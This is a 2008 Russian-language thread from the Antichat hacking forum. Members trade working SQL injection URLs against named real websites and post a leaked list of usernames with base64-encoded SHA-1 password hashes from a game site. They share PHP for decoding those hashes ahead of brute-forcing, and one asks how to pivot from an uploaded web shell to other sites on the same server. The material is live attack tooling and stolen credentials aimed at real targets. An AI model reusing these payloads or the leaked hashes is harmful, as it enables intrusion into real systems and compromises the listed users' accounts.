
25.04.2008, 11:35
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
гг, вот что действительно странно
Spyder (17:17:53 12/03/2008)
Warning: mssql_query() [function.mssql-query]: message: Line 1: Incorrect syntax near '\'. (severity 15) in /bigdisk/www/html/research/alcator/program/cmod_runs.php on line 119
Spyder (17:18:07 12/03/2008)
меня глючит или это мсскл на линухе?
ettee (17:19:30 12/03/2008)
ой,спудер...
ettee (17:19:32 12/03/2008)
ом
ettee (17:19:37 12/03/2008)
наебывают?
Spyder (17:19:40 12/03/2008)
я хз
Spyder (17:20:37 12/03/2008)
http://www.psfc.mit.edu/research/alcator/program/cmod_runs.php?run=1050525'
|
|
|

25.04.2008, 11:40
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
Сообщение от GrAmOzEkA
это значит system отключено, юзай include
поржал)
Последний раз редактировалось Spyder; 25.04.2008 в 11:42..
|
|
|

25.04.2008, 11:46
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
С нами:
10261766
Репутация:
1079
|
|
Spyder, mssql может быть удаленно расположенной бд
|
|
|

25.04.2008, 11:53
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
не подумал =)
|
|
|

25.04.2008, 16:07
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Передал параметру одного из сайтов -1+union+select+1,2,3,4,5--
Выдало ошибку : Microsoft OLE DB Provider for SQL Server error '80040e07'
Operand type clash: ntext is incompatible with int
/news/index.asp, line 20
Кроме как cast в голову ничё не приходит. Читал, что взломать можно только сайты с ошибками 80040e14(*идеальная ошибка*).Неужели это так? ( Так мало сайтов тогда уязвимы чтоли Ж(
Предварительно подобрал количество полей.
Да и вот ещё что : попадает ли под красивый запрос такая хрень ? :
Warning: mssql_query(): message: Conversion failed when converting the nvarchar value '-1 order by 1000--' to data type int. (severity 16) in *какой-то путь к скрипту* on line 17
Вот ещё ошибка при выборе из бд -
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value 'Òàê è æèâåì' to a column of data type int.
/index.asp, line 50
Как преобразовать нормально?)
Последний раз редактировалось Велемир; 25.04.2008 в 17:11..
|
|
|

25.04.2008, 16:50
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
С нами:
9574565
Репутация:
712
|
|
Сообщение от Doom123
Код:
https://www.lina2.ru/clans/index.php?showclan=-1+union+select+login,password+from+accounts/*
login  ass
парль зашифрован
base64_encode(pack('H*'sha1($apss)))
Схема БД(спасибо Scipio):
Код:
http://www.lina2.ru/clans/index.php?showclan=-268520741+union+select+concat(table_schema,0x3a,ta ble_name,0x3a,column_name),null+from+information_s chema.columns+where+table_schema+like+0x6C3225/*
Код HTML:
11099 PkdTSrZ22Jp9HBzYgkJ2yk8nEWI=
membel 9Qu39+nMMEM3kwc1Pb4882N3kt8=
koliaxtx O9yXyh2aY2gj2ExrnFhec93nGpE=
1401 lCOPqkIxlJ637ZxppwwLZ0r5JUA=
15valera15 4VQ2ikpjLNsxVM5jC5jNZD0Xr3o=
16valera16 4VQ2ikpjLNsxVM5jC5jNZD0Xr3o=
19630812 8I2BsLabPCh3DKL7U6z6dlRWfAM=
1lakosta1 hMCldvvsnfyE7bUkzRAIY7ks5R4=
1niger1 zSAcOz7JBqXyFEYnaa9qYyMgfQo=
2008 /D9xitkeYMLqfvGQ9NBpaPBSAPU=
777 /HpzTbpRjwMmCN/rBPTut58CWqc=
888 6qZ/OpPQrLCNil6P+YZvUZg7PDs=
999 r8l+oTH9fiaVqY7zQBNgj5fzTh0=
000 iu+wbEJuB6CmcaHiSItIWNaUpzA=
Вот тут ЛОгин --- ПАСС
Теоритечески можно узнать пароли ?
|
|
|

25.04.2008, 17:07
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами:
10262314
Репутация:
668
|
|
$a = base64_decode('iu+wbEJuB6CmcaHiSItIWNaUpzA=');
$b = unpack('H*',$a);
echo $b;
И нада брутить SHA-1 хэш
|
|
|

25.04.2008, 17:44
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
http://www.donland.ru/news.asp?Id=-1+union+select+top+1+cast(column_name+as+nvarchar) ,2,3,4,5,6,7,8,9,10+from+information_schema.column s--
Хули не выходит  ((
|
|
|

25.04.2008, 17:52
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами:
9851426
Репутация:
3908
|
|
Сообщение от Велемир
http://www.donland.ru/news.asp?Id=-1+union+select+top+1+cast(column_name+as+nvarchar) ,2,3,4,5,6,7,8,9,10+from+information_schema.column s--
Хули не выходит  ((
Это MSSQL!!!
http://www.donland.ru/news.asp?Id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+I NFORMATION_SCHEMA.TABLES)--
https://forum.antichat.ru/thread30501.html
|
|
|

25.04.2008, 17:49
|
|
Познающий
Регистрация: 07.03.2008
Сообщений: 41
С нами:
9567101
Репутация:
17
|
|
Вопрос: есть шелл на 1 сайте.На том же сервере есть еще 2 сайта.Как к ним получить доступ(при помощи уже залитого шелла)?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|